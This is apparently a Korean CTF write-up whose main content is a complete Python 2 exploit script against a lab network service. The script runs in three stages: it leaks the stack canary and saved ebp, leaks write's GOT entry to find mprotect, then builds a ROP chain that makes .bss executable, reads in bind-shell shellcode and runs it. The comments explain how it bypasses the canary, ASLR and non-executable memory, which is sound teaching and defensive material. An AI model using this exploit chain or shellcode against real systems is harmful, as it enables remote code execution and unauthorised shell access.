해당 문제의 exploit은 3개의 stage로 구성하였다.
stage1은 canary와 ebp를 구하는 부분
stage2는 write를 사용해 memory leak을 시켜서 mprotect의 주소를 구하는 부분
stage3은 mprotect로 bss영역에 실행권한을 준 뒤, bind_tcp쉘코드를 실행시키는 부분이다.
from socket import *
from struct import *
from time import sleep
# Write-up exploit script, structured as the three stages described above:
#   stage 1 - leak the stack canary and saved ebp from the service's reply
#   stage 2 - return into write@plt to read write's GOT entry and derive mprotect
#   stage 3 - mprotect() the .bss range RWX, read() the shellcode into it, jump to it
# Each stage is a separate connection, and the overflow is reused each time with the
# leaked canary/ebp spliced in so the stack protector check passes.
# Python 2 only: `print` statements and `str` used as a byte buffer (pack() returns str).
# Defender's reading: the chain routes around three mitigations - the stack canary
# (defeated by the stage-1 info leak), libc ASLR (defeated by the stage-2 GOT read) and
# non-executable memory (defeated by calling mprotect with PROT_RWX). Denying
# executable-memory transitions (no PROT_EXEC via mprotect) stops stage 3 outright,
# and the fixed reply offsets / libc delta below are specific to the write-up's target
# build, which is why hard-coded exploits of this shape are brittle.

# 32-bit little-endian pack/unpack helpers (x86).
p = lambda x : pack("<L", x)
up = lambda x : unpack("<L",x)[0]
# Lab target used by the author; not a public host.
HOST = "192.168.220.128"
PORT = 8888
# Addresses from the (non-PIE) target binary.
write_plt = 0x080486e0
write_got = 0x0804b040
read_plt = 0x08048620
freespace = 0x0804b080   # writable scratch address in .bss; stage 3 read()s the shellcode here
ppppr=0x080495bc         # presumably a pop;pop;pop;pop;ret gadget (name only) - used to discard mprotect's 4 args
pr = 0x080495bf          # presumably pop;ret - unused in this script
# File descriptor number handed to write()/read() in the ROP chain; presumably the
# client socket inside the target process (verify against the binary).
fd = 4
# The write-up describes this as bind_tcp shellcode; it is only ever written into
# `freespace` by the stage-3 read() and executed from there, so it runs only because
# mprotect() made that range executable first.
shellcode=("\x31\xc0"+
"\x50"+
"\x40"+
"\x89\xc3"+
"\x50"+
"\x40"+
"\x50"+
"\x89\xe1"+
"\xb0\x66"+
"\xcd\x80"+
"\x31\xd2"+
"\x52"+
"\x66\x68\x13\xd2"+
"\x43"+
"\x66\x53"+
"\x89\xe1"+
"\x6a\x10"+
"\x51"+
"\x50"+
"\x89\xe1"+
"\xb0\x66"+
"\xcd\x80"+
"\x40"+
"\x89\x44\x24\x04"+
"\x43"+
"\x43"+
"\xb0\x66"+
"\xcd\x80"+
"\x83\xc4\x0c"+
"\x52"+
"\x52"+
"\x43"+
"\xb0\x66"+
"\xcd\x80"+
"\x93"+
"\x89\xd1"+
"\xb0\x3f"+
"\xcd\x80"+
"\x41"+
"\x80\xf9\x03"+
"\x75\xf6"+
"\x52"+
"\x68\x6e\x2f\x73\x68"+
"\x68\x2f\x2f\x62\x69"+
"\x89\xe3"+
"\x52"+
"\x53"+
"\x89\xe1"+
"\xb0\x0b"+
"\xcd\x80")
print "[+]exploit start"
print "[+]stage1"
#stage1
# Connect, drain four banner/menu chunks, pick menu item "4", then send an 11-byte
# input and keep the reply. The leak relies on the reply containing bytes beyond
# the supplied input (presumably the service echoes past the buffer) - the slices
# below are fixed offsets into that reply for this particular binary.
s=socket()
s.connect((HOST,PORT))
s.recv(1024)
s.recv(1024)
s.recv(1024)
s.recv(1024)
s.send("4")
s.recv(1024)
s.send("yyyyyyyyyyy")
parse_string=s.recv(1024)
s.close()
sleep(0.1)
print "[+]get canary"
# The canary's lowest byte is assumed to be 0x00 (it is not present in the text reply),
# so only its upper three bytes are taken from the reply, at offsets 23..25.
canary=""
canary+=chr(0x00)
canary+=(parse_string)[23:26]
print "[+]get ebp"
# Saved ebp: 4 bytes at reply offsets 34..37.
ebp=""
ebp+=(parse_string)[34:38]
print "[+]stage2"
#stage2
# Overflow layout: 10 bytes of padding, the leaked canary, 8 more bytes, the saved ebp,
# then the return address. The chain calls write@plt with the next slot (p(0)) as the
# return address after write, followed by its arguments: write(fd, write_got, 4),
# i.e. it sends the 4-byte resolved address of write@libc back over the socket.
payload = ""
payload += "a"*10
payload += canary
payload += "a"*8
payload += ebp
payload += p(write_plt)
payload += p(0)
payload += p(fd)
payload += p(write_got)
payload += p(4)
print "[+]reconnection"
# Same banner/menu sequence as stage 1.
s=socket()
s.connect((HOST,PORT))
s.recv(1024)
s.recv(1024)
s.recv(1024)
s.recv(1024)
s.send("4")
s.recv(1024)
print "[+]send payload"
s.send(payload)
sleep(1)
print "[+]get mprotect@libc"
# Read the 4 leaked bytes and add a fixed delta to reach mprotect; 0xc9a0 is the
# write->mprotect distance in the target's libc build and will differ elsewhere.
write_libc=s.recv(4)
mprotect=up(write_libc)+0xc9a0
print "[+]mprotect address:%s" %hex(mprotect)
s.close()
print "[+]preparation payload"
# Stage-3 chain (same padding/canary/ebp prefix):
#   mprotect(0x0804b000, 0x2000, 7)  -> 7 = PROT_READ|PROT_WRITE|PROT_EXEC over the page range holding .bss
#   return into ppppr to pop the 3 args plus the following `ebp` slot
#   read(fd, freespace, len(shellcode)) with `freespace` as its return address,
#   so after the shellcode bytes are read in, execution continues at freespace.
payload = ""
payload += "a"*10
payload += canary
payload += "a"*8
payload += ebp
payload += p(mprotect)
payload += p(ppppr)
payload += p(0x0804b000)
payload += p(0x2000)
payload += p(7)
payload += ebp
payload += p(read_plt)
payload += p(freespace)
payload += p(fd)
payload += p(freespace)
payload += p(len(shellcode))
print "[+]stage3"
#stage3
print "[+]reconnection"
# Same banner/menu sequence, then send the chain, wait for the target to reach
# read(), and supply the shellcode bytes that read() is waiting for.
s=socket()
s.connect((HOST,PORT))
s.recv(1024)
s.recv(1024)
s.recv(1024)
s.recv(1024)
s.send("4")
s.recv(1024)
print "[+]send payload"
s.send(payload)
sleep(1)
print "[+]send shellcode"
s.send(shellcode)
s.close()